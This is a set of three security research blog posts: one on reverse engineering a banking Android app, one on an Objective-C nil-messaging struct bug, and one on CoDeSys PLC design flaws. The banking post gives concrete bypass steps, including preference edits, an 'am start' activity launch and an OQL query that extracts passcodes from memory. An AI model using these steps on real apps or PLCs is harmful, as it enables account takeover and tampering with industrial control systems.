INSIGHTS | November 7, 2012

Hacking an Android Banking Application

This analysis of a mobile banking application from X bank illustrates how easily anyone with sufficient knowledge can get install and analyze the application, bypassing common protections.

 

1. Installing and unpacking the application

 

Only users located in Wonderland can install the X Android application with Google Play, which uses both the phone’s SIM card and IP address to determine the location of the device. To bypass this limitation, remove the SIM card and reset the phone to factory defaults.

 

Complete the initial Android setup with a Wonderland IP address, using an L2TP VPN service (PPTP encryption support is broken). If Google Play recognizes the device as located in Wonderland, install the application. Once installed in a rooted phone, copy the application APK from /data/app/com.X.mobile.android.X.apk.

 

These are some of the many reversing tools for unpacking and decompiling the APK package:

 

   apktool                                    http://code.google.com/p/android-apktool/

   smali/baksmali http://code.google.com/p/smali/
   dex2jar                                    http://code.google.com/p/dex2jar/
   jd-gui                          http://java.decompiler.free.fr/?q=jdgui
   apkanalyser                https://github.com/sonyericssondev
 

In this example, the code was decompiled using jd-gui after converting the apk file to jar using the dex2jar tool. The source code produced by jd-guifrom Android binary files is not perfect, but is a good reference. The output produced by the baksmali tool is more accurate but difficult to read. The smalicode was modified and re-assembled to produce modified versions of the application with restrictions removed. A combination of decompiled code review, code patching, and network traffic interception was used to analyze the application.

 

 

2. Bypassing the SMS activation

 

The application, when started for the first time, asks for a Wonderland mobile number. Activating a new account requires an activation code sent by SMS. We tested three different ways to bypass these restrictions, two of which worked. We were also able to use parts of the application without a registered account.

 

2.1 Intercepting and changing the activation code HTTPS request

 

The app GUI only accepts cell phone numbers with the 0X prefix; always adding the +XX prefix before requesting an activation code from the web service at https://android.X.com/activationCode

 

Intercepting the request and changing the phone number didn’t work, because the phone prefix is verified on the server side.

 

 

2.2 Editing shared preferences

 

The app uses the “Shared Preferences” Android service to store its minimal configuration. The configuration can be easily modified in a rooted phone by editing the file

 

/data/data/com.X.mobile.android.X/shared_prefs/preferences.xml

 

Set the “activated” preference to “true” like this:

 

<?xml version=’1.0′ encoding=’utf-8′ standalone=’yes’ ?>

<map>
<boolean name=”welcome_screen_viewed ” value=”true” />
<string name=”msisdn”>09999996666</string>
<boolean name=”user_notified” value=”true” />
<boolean name=”activated ” value=”true” />
<string name=”guid” value=”” />
<boolean name=”passcode_set” value=”true” />
<int name=”version_code” value=”202″ />
</map>

 

2.3 Starting the SetPasscode activity

 

The Android design allows the user to bypass the normal startup and directly start activities exported by applications. The decompiled code shows that the SetPasscodeactivity can be started after the activation code is verified. Start the SetPasscode activity using the “am” tool as follows:

 

From the adb root shell:

 

#am start -a android.intent.action.MAIN -n com.X.mobile.android.X/.activity.registration.SetPasscodeActivity

 

3. Intercepting HTTPS requests

 

To read and modify the traffic between the app and the server, perform a SSL/TLS MiTM attack. We weren’t able to create a CA certificate and install it using the Android’s user interface with the Android version we used for testing. Android ignores CA certificates added by the user. Instead, we located and then modified the app’s http client code to make it accept any certificate. Then we installed the modified APK file on the phone. Using iptables on the device, we could redirect all the HTTPS traffic to an MiTM proxy to intercept and modify requests sent by the application.

 

4. Data storage

 

The app doesn’t store any data on external storage (SD card), and it doesn’t use the SQLlite database. Preferences are stored on the “Shared Preferences” XML file. Access to the preferences is restricted to the application. During a review of the decompiled code, we didn’t find any evidence of sensitive information being stored in the shared preferences.

 

 

5. Attack scenario: Device compromised while the app is running.

 

The X android application doesn’t store sensitive information on the device. In the event of theft, loss or remote penetration, the auto lockout mechanism reduces the risk of unauthorized use of the running application. When the app is not being used or is running in background, the screen is locked and the passcode must be entered to initiate a new session. The HTTPS session cookie expires after 300 seconds. The current session cookie is removed from memory when the application is locked.

 

5.1 Attacker with root privileges

 
An attacker with root access to the device can obtain the GUID and phone number  from the unencrypted XML configuration file; but without the clear-text or encrypted passcode, mobile banking web services cannot be accessed. We have discovered a way to “unlock” the application using the Android framework to start the AccountsFragmentActivity activity, but if the web session has already expired, the app limits the attacker to a read-only access. The most profitable path for the attacker at this point is the running process memory dump, as we explain in the next section.

5.2 Memory dump analysis.

An attacker who gets root access can acquire the memory of a running Android application in several different ways. “Acquisition and Analysis of Volatile Memory from Android Devices,” published in the Digital Investigation Journal, describes some of the different methods.

 

We used the ddms (Dalvik Debug Monitor Services) tool included with the Android SDK to acquire the memory dump. The Eclipse Memory Analyzer tool with Object Query Language support is one of the most powerful ways to explore the application memory. The application passcodes are short numeric strings; a simple search using regular expressions returns too many occurrences. The attacker can’t try every occurrence of numeric strings in the process memory as a passcode for the app web services because the account is blocked after a few attempts. The HTTPS session cookies are longer strings and easier to find.

 

By searching for the prefix “JSESSION,” the attacker can easily locate the cookies when the application is running and active. However, the cookies are removed from memory after a timeout. The ActivityTimeoutTracker function calls the method clear() of the HashMap used to store the cookies. The cookie HashMap is accessed through the singleton class com.X.a.a.e.b.

 

 

Reviewing the decompiled code, we located a variable where the passcode is stored before being encrypted to perform the session initiation request. The field String f of the class com.X.a.a.d.a contains the passcode, and it is never overwritten or released. The references to the instance prevent the garbage collection of the string. Executing the OQL query “SELECT toString(object.f) FROM com.X.a.a.d.a object” inside the Eclipse Memory Analyzer is sufficient to reliably locate the passcode in the application memory dump.

 

Although developers tried to remove information from the memory to prevent this type of attack, they left the most important piece of information unprotected.

 

 

 

 

6. Attack scenario: Perform MiTM using a compromised CA

 

The banking application validates certificates against all the CA certificates that ship with Android. Any single compromised CA in the system key store can potentially compromise communication between the app and the backend. An active network attacker can hijack the connection between the mobile app and the server to impersonate the user.

 

Mobile apps making SSL/TLS connections to a service controlled by the vendor don’t need to trust Certificate Authorities signatures. The app could therefore implement certificate “pinning” or distribute a signing certificate created by the vendor.

 

The authentication protocol is vulnerable to MiTM attacks. The app’s authentication protocol uses the RSA and 3DES algorithms to encrypt the passcode before sending it to the server. After the user types the passcode and presses the “login” button, the client retrieves an RSA public key from the server without having to undergo any authenticity check, which allows for an MiTM attack. We were able to implement an attack and capture the passcodes from the app in our testing environment. Although the authentication protocol implemented by the app is insecure, attacks are prevented by the requirement of SSL/TLS for every request. Once someone bypasses the SSL/TLS certificate verification, though, the encryption of the passcode doesn’t provide extra protection.

 

 

7. Attack scenario: Enumerate users

 

The web service API allows user enumeration. With a simple JSON request, attackers can determine if a given phone number is using the service, and then use this information to guess passwords or mount social engineering attacks.

 

  

 

About Juliano

 

Juliano Rizzo has been involved in computer security for more than 12 years, working on vulnerability research, reverse engineering, and development of high quality exploits for bugs of all classes. As a researcher he has published papers, security advisories, and tools. His recent work includes the ASP.NET “padding oracle” exploit, the BEAST attack, and the CRIME attack. Twitter: @julianor

 

 

INSIGHTS | November 2, 2012

iOS Security: Objective-C and nil Pointers

iOS devices are everywhere now. It seems that pretty much every other person has one…an iPhone, iPad or iPod touch – and they’re rivaled in popularity only by Android devices.

If you do secure code review, chances are that with the explosion in the number of iOS apps, you may well have done a source code review of an iOS app, or at least played around with some Objective-C code. Objective-C can be a little strange at first for those of us who are used to plain C and C++ (i.e. all the square brackets!), and even stranger for Java coders, but after a while most of us realise that the standard iOS programming environment is packed with some pretty powerful Cocoa APIs, and Objective-C itself actually has some cool features as well. The runtime supports a number of quirky features as well, which people tend to learn shortly after the standard “Hello, World!” stuff…

Objective-C brings a few of its own concepts and terminology into the mix as well. Using Objective-C syntax, we might call a simple method taking one integer parameter like this:

returnVal = [someObject myMethod:1234];

In other object-oriented languages like C++ and Java we’d normally just refer to this as “calling a member function” or “calling a method”, or even “calling a method on an object”. However, Objective-C differs slightly in this respect and as such, you do not call methods – instead, you “send a message to an object”. This concept as a whole is known as ‘message passing’.

The net result is the same – the ‘myMethod’ method associated with someObject’s class is called, but the semantics in how the runtime calls the method is somewhat different to how a C++ runtime might.

Whenever the ObjC compiler sees a line of code such as “[someObject myMethod]”, it inserts a call to one of the objc_msgSend(_XXX) APIs with the “receiver” (someObject) and the “selector” (“myMethod:”) as parameters to the function. This family of functions will, at runtime, figure out which piece of code needs to be executed bearing in mind the object’s class, and then eventually JMPs to it. This might seem a bit long-winded, but since the correct method to call is determined at runtime, this is part of how Objective-C gets its dynamism from.

The call above may end up looking something roughly like this, after the compiler has dealt with it:

objc_msgSend(someObject, “myMethod:”, 1234);

The version of objc_msgSend that is actually called into depends on the return type of the method being called, so accordingly there are a few versions of the interface in the objc_msgSend family.
For example, objc_msgSend() (for most return types), objc_msgSend_fpret() (for floating point return values), and objc_msgSend_stret(), for when the called method returns a struct type.

But what happens if you attempt to message a nil object pointer? Everyone who plays around with Objective-C code long enough soon realises that calling a method on a nil object pointer – or, more correctly, “messaging” a nil object pointer – is perfectly valid. So for example:

someObject = nil;
[someObject myMethod];

is absolutely fine. No segmentation fault – nothing. This is a very deliberate feature of the runtime, and many ObjC developers in fact use this feature to their advantage. You may end up with a nil object pointer due to an object allocation failure (out of memory), or some failure to find a substring inside a larger string, for example…

i.e.

 MyClass myObj = [[MyClass alloc] init]; // out-of-memory conditions give myObj == nil

In any case, however an object pointer got to be nil, there are certain coding styles that allow a developer to use this feature perfectly harmlessly, and even for profit. However, there are also ways that too-liberal use of the feature can lead to bugs – both functionally and security-wise.

One thing that needs to be considered is, what do objc_msgSend variants return if the object pointer was indeed found to be nil? That is, we have have

 myObj = nil;
someVariable = [myObj someMethod];

What will someVariable be equal to? Many developers assume it will always be some form of zero – and often they would be correct – but the true answer actually depends on the type of value that someMethod is defined to return.  Quoting from Apple’s API documentation:

“””
– If the method returns any pointer type, any integer scalar of size less than or equal to sizeof(void*), a float, a double, a long double, or a long long, then a message sent to nil returns 0.

– If the method returns a struct, as defined by the OS X ABI Function Call Guide to be returned in registers, then a message sent to nil returns 0.0 for every field in the struct. Other struct data types will not be filled with zeros.

– If the method returns anything other than the aforementioned value types, the return value of a message sent to nil is undefined.
“””

The second line above looks interesting. The rule on the second line deals with methods that return struct types, for which the objc_msgSend() variant called in these cases will be the objc_msgSend_stret() interface.. What the above description is basically saying is, if the struct return type is larger than the width of the architecture’s registers (i.e. must be returned via the stack), if we call a struct-returning method on a nil object pointer, the ObjC runtime does NOT guarantee that our structure will be zeroed out after the call. Instead, the contents of the struct are undefined!

When structures to be “returned” are larger than the width of a register, objc_msgSend_stret() works by writing the return value into the memory area specified by the pointer passed to objc_msgSend_stret(). If we take a look in Apple’s ARM implementation of objc_msgSend_stret() in the runtime[1], which is coded in pure assembly, we can see how it is indeed true that the API does nothing to guarantee us a nicely 0-initialized struct return value:

/********************************************************************
* struct_type    objc_msgSend_stret(id    self,
*                SEL    op,
*                    …);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for a1 to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: a1 is the address where the structure is returned,
*           a2 is the message receiver,
*           a3 is the selector
********************************************************************/

ENTRY objc_msgSend_stret
# check whether receiver is nil
teq     a2, #0
bxeq    lr

If the object pointer was nil, the function just exits…no memset()’ing to zero – nothing, and the “return value” of objc_msgSend_stret() in this case will effectively be whatever was already there in that place on the stack i.e. uninitialized data.

Although I’ll expand more later on the possible security consequences of getting
undefined struct contents back, most security people are aware that undefined/uninitialized data can lead to some interesting security bugs (uninitialized pointer dereferences, information leaks, etc).

So, let’s suppose that we have a method ‘myMethod’ in MyClass, and an object pointer of type MyClass that is equal to nil, and we accidentally attempt to call
the myMethod method on the nil pointer (i.e. some earlier operation failed), we have:

struct myStruct {
int myInt;
int otherInt;
float myFloat;
char myBuf[20];
}

[ … ]

struct myStruct returnStruct;

myObj = nil;
returnStruct = [myObj myMethod];

Does that mean we should definitely expect returnStruct, if we’re running on our ARM-based iPhone, to be full of uninitialized junk?

Not always. That depends on what compiler you’re using, and therefore, in pragmatic terms, what version of Xcode the iOS app was compiled in.

If the iOS app was compiled in Xcode 4.0 or earlier, where the default compiler is GCC 4.2[2], messaging nil with struct return methods does indeed result in undefined structure contents, since there is nothing in the runtime nor the compiler-generated assembly code to zero out the structure in the nil case.

However, if the app was compiled with LLVM-GCC 4.2 (Xcode 4.1) or Apple LLVM (circa Xcode 4.2), the compiler inserts assembly code that does a nil check followed by a memset(myStruct, 0x00, sizeof(*myStruct)) if the object pointer was indeed nil, adjacent to all objc_msgSend_stret() calls.

Therefore, if the app was compiled in Xcode 4.1 or later (LLVM-GCC 4.2 or Apple LLVM), messaging nil is *guaranteed* to *always* result in zeroed out structures upon return – so long as the default compiler for that Xcode release is used.. Otherwise, i.e. Xcode 4.0, the struct contents are completely undefined.

These two cases become apparent by comparing the disassemblies for calls to objc_msgSend_stret() as generated by 1) GCC 4.2, and 2) Apple LLVM. See the IDA Pro screen dumps below.

 Figure 1 – objc_msgSend_stret() with GCC 4.2

Figure 2 – objc_msgSend_stret() with Apple LLVM

Figure 1 clearly shows objc_msgSend_stret() being called whether the object pointer is nil or not, and upon return from the function memcpy() is used to copy the “returned”  struct data into the place we asked the structure to be returned to, i.e. our struct on stack. If the object pointer was nil, objc_msgSend_stret() just exits and ultimately this memcpy() ends up filling our structure with whatever happened to be there on the stack at the time…

In Figure 2, on the other hand, we see that the ARM ‘CBZ’ instruction is used to test the object pointer against 0 (nil) before the objc_msgSend_stret() call, with the memset()-to-0 code path instead being taken if the pointer was indeed nil. This guarantees that in the case of the objective pointer being nil, the structure will be completely zeroed.

Thus, summed up, any iOS applications released before July 2011 are extremely likely to be vulnerable, since they were almost certainly compiled with GCC. Apps built with Xcode 4.1 and up are most likely not vulnerable. But we have to bear in mind that a great deal of developers in real-world jobs do not necessarily update their IDE straightaway, regularly, or even at all (ever heard of corporate policy?). By all accounts, it’s probable that vulnerable apps (i.e. Xcode 4.0) are still being released on the App Store today.

It’s quite easy to experiment with this yourself with a bit of test code. Let’s write some code that demonstrates the entire issue. We can define a class called HelloWorld, and the class contains one method that returns a ‘struct teststruct’ value; and the method it simply puts a ton of recognisable data into an instance of ‘teststruct’, before returning it. The files in the class definition look like this:

hello.m

#import “hello.h”

@implementation HelloWorld

– (struct teststruct)sayHello
{
// NSLog(@”Hello, world!!nn”);

struct teststruct testy;
testy.testInt = 1337;
testy.testInt2 = 1338;
testy.inner.test1 = 1337;
testy.inner.test2 = 1337;

testy.testInt3 = 1339;
testy.testInt4 = 1340;
testy.testInt5 = 1341;
testy.testInt6 = 1341;
testy.testInt7 = 1341;
testy.testInt8 = 1341;
testy.testInt9 = 1341;
testy.testInt10 = 1341;
testy.testFloat = 1337.0;
testy.testFloat1 = 1338.1;
testy.testLong1 = 1337;
testy.testLong2 = 1338;

strcpy((char *)&testy.testBuf, “hello worldn”);

return testy;
}

@end

hello.h

#import <Foundation/Foundation.h>

@interface HelloWorld : NSObject {
// no instance variables
}

// methods
– (struct teststruct)sayHello;

@end

struct teststruct {
int testInt;
int testInt2;

struct {
int test1;
int test2;
} inner;

int testInt3;
int testInt4;
int testInt5;
int testInt6;
int testInt7;
int testInt8;
int testInt9;
int testInt10;
float testFloat;
float testFloat1;
long long testLong1;
long long testLong2;
char testBuf[20];

};

We can then write a bit of code in main() that allocates and initializes an object of class HelloWorld, calls sayHello, and prints the values it received back. Then, let’s set the object pointer to nil, attempt to call sayHello on the object pointer again, and then print out the values in the structure that we received that time around. We’ll use the following code:

#import <UIKit/UIKit.h>
#import <malloc/malloc.h>
#import “AppDelegate.h”
#import “hello.h”
#import “test.h”
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
struct teststruct testStructure1;
struct teststruct testStructure2;
struct teststruct testStructure3;
struct otherstruct otherStructure;

HelloWorld *hw = [[HelloWorld alloc] init];
TestObj *otherObj = [[TestObj alloc] init];

testStructure1 = [hw sayHello];

/* what did sayHello return? */
NSLog(@”nsayHello returned:n”);
NSLog(@”testInt = %dn”, testStructure1.testInt);
NSLog(@”testInt = %dn”, testStructure1.testInt2);
NSLog(@”testInt = %dn”, testStructure1.testInt3);
NSLog(@”testInt = %dn”, testStructure1.testInt4);
NSLog(@”testInt = %dn”, testStructure1.testInt5);
NSLog(@”testInt = %dn”, testStructure1.testInt6);
NSLog(@”testInt = %dn”, testStructure1.testInt7);
NSLog(@”testInt = %dn”, testStructure1.testInt8);
NSLog(@”testInt = %dn”, testStructure1.testInt9);
NSLog(@”testInt = %dn”, testStructure1.testInt10);
NSLog(@”testInt = %5.3fn”, testStructure1.testFloat);
NSLog(@”testInt = %5.3fn”, testStructure1.testFloat1);
NSLog(@”testInt = %dn”, testStructure1.testLong1);
NSLog(@”testInt = %dn”, testStructure1.testLong2);
NSLog(@”testBuf = %sn”, testStructure1.testBuf);

/* clear the struct again */
memset((void *)&testStructure1, 0x00, sizeof(struct teststruct));
hw = nil;  // nil object ptr
testStructure1 = [hw sayHello];  // message nil

/* what are the contents of the struct after messaging nil? */
NSLog(@”nnafter messaging nil, sayHello returned:n”);
NSLog(@”testInt = %dn”, testStructure1.testInt);
NSLog(@”testInt = %dn”, testStructure1.testInt2);
NSLog(@”testInt = %dn”, testStructure1.testInt3);
NSLog(@”testInt = %dn”, testStructure1.testInt4);
NSLog(@”testInt = %dn”, testStructure1.testInt5);
NSLog(@”testInt = %dn”, testStructure1.testInt6);
NSLog(@”testInt = %dn”, testStructure1.testInt7);
NSLog(@”testInt = %dn”, testStructure1.testInt8);
NSLog(@”testInt = %dn”, testStructure1.testInt9);
NSLog(@”testInt = %dn”, testStructure1.testInt10);
NSLog(@”testInt = %5.3fn”, testStructure1.testFloat);
NSLog(@”testInt = %5.3fn”, testStructure1.testFloat1);
NSLog(@”testInt = %dn”, testStructure1.testLong1);
NSLog(@”testInt = %dn”, testStructure1.testLong2);
NSLog(@”testBuf = %sn”, testStructure1.testBuf);
}

OK – let’s first test it on my developer provisioned iPhone 4S, by compiling it in Xcode 4.0 – i.e. with GCC 4.2 – since that is Xcode 4.0’s default iOS compiler. What do we get?

2012-11-01 21:12:36.235 sqli[65340:b303]
sayHello returned:
2012-11-01 21:12:36.237 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.238 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.238 sqli[65340:b303] testInt = 1339
2012-11-01 21:12:36.239 sqli[65340:b303] testInt = 1340
2012-11-01 21:12:36.239 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.240 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.241 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.241 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.242 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.243 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.244 sqli[65340:b303] testInt = 1337.000
2012-11-01 21:12:36.244 sqli[65340:b303] testInt = 1338.100
2012-11-01 21:12:36.245 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.245 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.246 sqli[65340:b303] testBuf = hello world

2012-11-01 21:12:36.246 sqli[65340:b303]

after messaging nil, sayHello returned:
2012-11-01 21:12:36.247 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.247 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.248 sqli[65340:b303] testInt = 1339
2012-11-01 21:12:36.249 sqli[65340:b303] testInt = 1340
2012-11-01 21:12:36.249 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.250 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.250 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.251 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.252 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.252 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.253 sqli[65340:b303] testInt = 1337.000
2012-11-01 21:12:36.253 sqli[65340:b303] testInt = 1338.100
2012-11-01 21:12:36.254 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.255 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.256 sqli[65340:b303] testBuf = hello world

Quite as we expected, we end up with a struct full of what was already there in the return position on the stack – and this just happened to be the return value from the last call to sayHello. In a complex app, the value would be somewhat unpredictable.

And now let’s compile and run it on my iPhone using Xcode 4.5, where I’m using its respective default compiler – Apple LLVM. The output:

2012-11-01 21:23:59.561 sqli[65866:b303]
sayHello returned:
2012-11-01 21:23:59.565 sqli[65866:b303] testInt = 1337
2012-11-01 21:23:59.566 sqli[65866:b303] testInt = 1338
2012-11-01 21:23:59.566 sqli[65866:b303] testInt = 1339
2012-11-01 21:23:59.567 sqli[65866:b303] testInt = 1340
2012-11-01 21:23:59.568 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.569 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.569 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.570 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.571 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.572 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.572 sqli[65866:b303] testInt = 1337.000
2012-11-01 21:23:59.573 sqli[65866:b303] testInt = 1338.100
2012-11-01 21:23:59.574 sqli[65866:b303] testInt = 1337
2012-11-01 21:23:59.574 sqli[65866:b303] testInt = 1338
2012-11-01 21:23:59.575 sqli[65866:b303] testBuf = hello world

2012-11-01 21:23:59.576 sqli[65866:b303]

after messaging nil, sayHello returned:
2012-11-01 21:23:59.577 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.577 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.578 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.578 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.579 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.579 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.580 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.581 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.581 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.582 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.582 sqli[65866:b303] testInt = 0.000
2012-11-01 21:23:59.673 sqli[65866:b303] testInt = 0.000
2012-11-01 21:23:59.673 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.674 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.675 sqli[65866:b303] testBuf =

Also just as we expected; the Apple LLVM built version gives us all zeroed struct fields, as the compiler-inserted memset() call guarantees us a zeroed struct when we message nil.

Now, to be pragmatic, what are some potential security consequences of us getting junk, uninitialized data back, in real-world applications?

One possible scenario is to consider if we had a method, say, returnDataEntry, that, for example, returns a struct containing some data and a pointer. We could make the scenario more detailed, but for argument’s sake let’s just assume the structure holds some data and a pointer to some more data.

Consider the following code fragment, in which the developer knows they’ll receive a zeroed structure from returnDataEntry if the someFunctionThatCanFail()
call fails:

 struct someData {
int someInt;
char someData[50];
void *myPointer;
}

[ … ]

– (struct someData)returnDataEntry
{

struct someData myData;
memset((void *)&myData, 0x00, sizeof(struct someData)); /* zero it out */

if(!someFunctionThatCanFail()) {  /* can fail! */
/* something went wrong, return the zeroed struct */
return myData;
}

/* otherwise do something useful */
myData = someUsefulDataFunction();
return myData;
}

In the error case, the developer knows that they can check the contents of the struct against 0 and therefore know if returnDataEntry ran successfully.

i.e.

myData = [myObj returnDataEntry];
if(myData.myPointer == NULL) {
/* the method failed */
}

/* otherwise, use the data and pointer */

However, if we suppose that the ‘myObj’ pointer was nil at the time of the returnDataEntry call, and our app was built with a vulnerable version of Xcode, the returned structure will be uninitialized, and myData.myPointer could be absolutely anything, so at this point, we have a dangling pointer and, therefore, a security bug.

Equally, what if some method is declared to return a structure, and that data is later sent to a remote server over the network? A scenario like this could easily result in information leaks, and it’s easy to see how that’s bad.

Lastly, which is also quite interesting, let’s consider some Cocoa APIs that take structs and process them. We’ll take a bog standard structure – NSDecimal, for example. The NSDecimal structure is defined as:

typedef struct {
signed   int _exponent:8;
unsigned int _length:4;     // length == 0 && isNegative -> NaN
unsigned int _isNegative:1;
unsigned int _isCompact:1;
unsigned int _reserved:18;
unsigned short _mantissa[NSDecimalMaxSize];
} NSDecimal;

It’s pretty obvious by those underscores that all fields in NSDecimal are ‘private’ – that is, they should not be directly used or modified, and their semantics are subject to change if Apple sees fit. As such, NSDecimal structures should only be used and manipulated using official NSDecimal APIs. There’s even a length field, which could be interesting.

The fact that all fields in NSDecimal are documented as being private[3] starts to make me wonder whether the NSDecimal APIs are actually safe to call on malformed NSDecimal structs. Let’s test that theory out.

Let’s assume we got a garbage NSDecimal structure back from messaging a nil object at some earlier point in the app, and then we pass this NSDecimal struct to Cocoa’s NSDecimalString() API. We could simulate the situation with a bit of code like this:

NSDecimal myDecimal;

/* fill the two structures with bad data */
memset(&myDecimal, 0x99, sizeof(NSDecimal));

NSLocale *usLocale = [[NSLocale alloc] initWithLocaleIdentifier:@”en_US”];

NSDecimalString(&myDecimal, usLocale);

What happens?

If we quickly just run this in the iOS Simulator (x86), we crash with a write access violation at the following line in NSDecimalString():

<+0505>  mov    %al,(%esi,%edx,1)

(gdb) info reg esi edx
esi            0xffffffca    -54
edx            0x38fff3f4    956298228

Something has clearly gone wrong here, since there’s no way that address is going to be mapped and writable…

It turns out that the above line of assembly is part of a loop which uses length values derived from
the invalid values in our NSDecimal struct. Let’s set a breakpoint at the line above our crashing line, and see what things look like at the first hit of the
breakpoint, and then, at crash time.

0x008f4275  <+0499>  mov    -0x11c(%ebp),%edx
0x008f427b  <+0505>  mov    %al,(%esi,%edx,1)

(gdb) x/x $ebp-0x11c
0xbffff3bc:    0xbffff3f4

So 0xbffff3f4 is the base address of where the loop is copying data to. And after the write AV, i.e. at crash time, the base pointer looks like:

(gdb) x/x $ebp-0x11c
0xbffff3bc:    0x38fff3f4
(gdb)

Thus after a little analysis, it becomes apparent that the root cause of the crash is stack corruption – the most significant byte of the base destination address is being overwritten (with a 0x38 byte) on the stack during the loop. This is at least a nods towards several Cocoa APIs not being designed to deal with malformed structs with “private” fields. There are likely to be more such cases, considering the sheer size of Cocoa.

Although NSDecimalString() is where the crash occurred, I wouldn’t really consider this a bug in the API per se, since it is well-documented that members of NSDecimal structs
are private. This could be considered akin to memory corruption bugs caused by misuse of strcpy() – the bug isn’t really in the API as such – it’s doing what is was designed to do – it’s the manner in which you used it that constitutes a bug.

Interestingly, it seems to be possible to detect which compiler an app was built with by running a strings dump on the Info.plist file found in an app’s IPA bundle.

Apple LLVM

sh-3.2# strings Info.plist | grep compiler
“com.apple.compilers.llvm.clang.1_0

LLVM GCC

sh-3.2# strings Info.plist | grep compiler
com.apple.compilers.llvmgcc42

GCC

sh-3.2# strings Info.plist | grep compiler
sh-3.2#

What are the take home notes here? Basically, if you use a method that returns a structure type, check the object against nil first! Even if you know YOU’RE not going to be using a mid-2011 version
of Xcode, if you post your library on GitHub or similar, how do you know your code is not going to go into a widely used banking product, for example? – the developers for which may still be using a slightly older version of Xcode, perhaps even due to corporate policy.

It’d therefore be a decent idea to include this class of bugs on your secure code review checklist for iOS applications.

Thanks for reading.

Shaun.

[1] http://www.opensource.apple.com/source/objc4/objc4-532/runtime/Messengers.subproj/objc-msg-arm.s

[2] http://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/WhatsNewXcode/Articles/xcode_4_1.html

[3] https://developer.apple.com/library/mac/#documentation/Cocoa/Reference/Foundation/Miscellaneous/Foundation_DataTypes/Reference/reference.html

P.S. I’ve heard that Objective-C apps running on PowerPC platforms can also be vulnerable to such bugs – except with other return types as well, such as float and long long. But I can’t confirm that, since I don’t readily have access to a system running on the PowerPC architecture.

INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, I had a fellow security nut give me some tips on this project to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool, from a hacker perspective. CoDeSys is an unusual ladder logic runtime for a number of reasons.

 

Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreter/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse-engineering the interpreted code and ASIC code, check out FX’s talk on Decoding Stuxnet at C3. It really is amazing, and FX has a level of patience in disassembling code for an unknown CPU that I think is completely unique.

 

CoDeSys is interesting to me because it doesn’t work like the Siemens ladder logic. CoDeSys compiles your ladder logic as byte code for the processor on which the ladder logic is running. On our Wago system, it was an x86 processor, and the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and then execution of the runtime jumps into the ladder logic file. This is great because we can easily disassemble a ladder logic file, or better, build our own file that executes system calls.

 

I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into three categories: the runtime is executing on top of an embedded OS, which lacks code privilege separation; the runtime is executing on Linux with a uid of 0; or the runtime is executing on top of Windows CE in single user mode. All three are bad for the same reasons.

 

All three mean of course that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts, it is worse because the APIs to commit Evil are well understood.

 

 I had said back in April that CoDeSys is in an amazing and unique position to help secure our critical infrastructure. Their product is used in thousands of product lines made by hundreds of vendors. Their implementation of secure ladder logic transfer and an encrypted and digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.

 

3S has published an advisory on setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLC) make extensive modification to the runtime source code.

 

Setting a password on CoDeSys protects code segments. In theory, this can prevent a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S has a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem was fixed, we still get arbitrary file upload and download with the privileges of the process (remember the note about administrator/root?). So as a bad guy, I could just upload a new binary, upload a new copy of the crontab file, and wait patiently for the process to execute.

 

The solution that I would like to see in future CoDeSys releases would include a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and added cryptographic security to the protocol to prevent man-in-the-middle and replay attacks.
